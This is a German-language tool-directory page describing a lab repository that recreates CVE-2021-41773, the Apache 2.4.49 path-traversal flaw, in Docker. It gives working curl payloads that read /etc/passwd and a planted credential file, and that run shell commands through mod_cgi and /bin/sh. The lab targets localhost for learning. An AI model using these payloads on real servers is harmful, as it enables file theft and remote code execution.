Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-41773-exploration — Nachstellung und Analyse eines eigenartigen Logikfehlers in Apache 2.4.49, der zu Remote-Code-Ausführung eskalierte. | Kitploit
Tools/GitHubGitHub/klmntbelgium/cve-2021-41773-exploration
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubklmntbelgium/cve-2021-41773-exploration

cve-2021-41773-exploration

Nachstellung und Analyse eines eigenartigen Logikfehlers in Apache 2.4.49, der zu Remote-Code-Ausführung eskalierte.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Übersicht

CVE-2021-41773 ist eine Path-Traversal-Sicherheitslücke, die im Oktober 2021 im Apache HTTP Server 2.4.49 entdeckt wurde. Die Ursache lag darin, dass Punkte-Sequenzen am Ende der URL nicht ordnungsgemäß normalisiert wurden, bevor geprüft wurde, ob der angeforderte Pfad innerhalb des Web-Root-Verzeichnisses blieb. Diese Sicherheitslücke erlaubte einem Angreifer, das Web-Root zu verlassen, um auf beliebige Dateien im Dateisystem des Servers zuzugreifen, wobei in einigen Fällen eine Eskalation bis hin zur Remote-Code-Ausführung möglich war.

2 Angriffsvektoren werden in dieser Erkundung demonstriert:

  • Path Traversal: Lesen beliebiger Dateien im Dateisystem
  • Path Traversal + Remote Code Execution: Ausführen beliebiger Betriebssystembefehle

Voraussetzungen:

Docker
curl
Linux oder macOS

Repository-Inhalt:

Dockerfile - Erstellt einen anfälligen Apache-2.4.49-Container
exploit.sh - Automatisiertes Exploit-Chain-Skript
README.md

Übersicht über das Dockerfile:

  • Root-Verzeichniszugriff (ermöglicht Traversal)
  • Aktivierung von mod_cgi (eskaliert einfaches Traversal zu RCE)
  • Flag-Datei unter /etc/secret_credential.txt platziert, um unbefugten Datenzugriff zu demonstrieren

Ausführen des Exploits:

Hinweis: Stellen Sie sicher, dass Docker installiert ist und läuft.

Option 1: Automatisches Skript
chmod +x exploit.sh
./exploit.sh

Option 2: Manuelle Ausführung
Image erstellen und Container ausführen:
sudo docker build -t cve-2021-41773-env .
sudo docker run -d -p 8080:80 --name vulnerable-apache cve-2021-41773-env

Einzelne curl-Befehle für manuelle Experimente:
Stufe 1 — Hinterlegtes Geheimnis lesen (reines Traversal, kein CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/secret_credential.txt"

Stufe 2 — /etc/passwd lesen (reines Traversal, kein CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

Stufe 3 — RCE: Befehle ausführen (erfordert mod_cgi)
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; id; whoami; uname -a" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

Stufe 4 — Vollständige Kette: Geheimnis per RCE lesen
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; cat /etc/secret_credential.txt" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

Tool herunterladen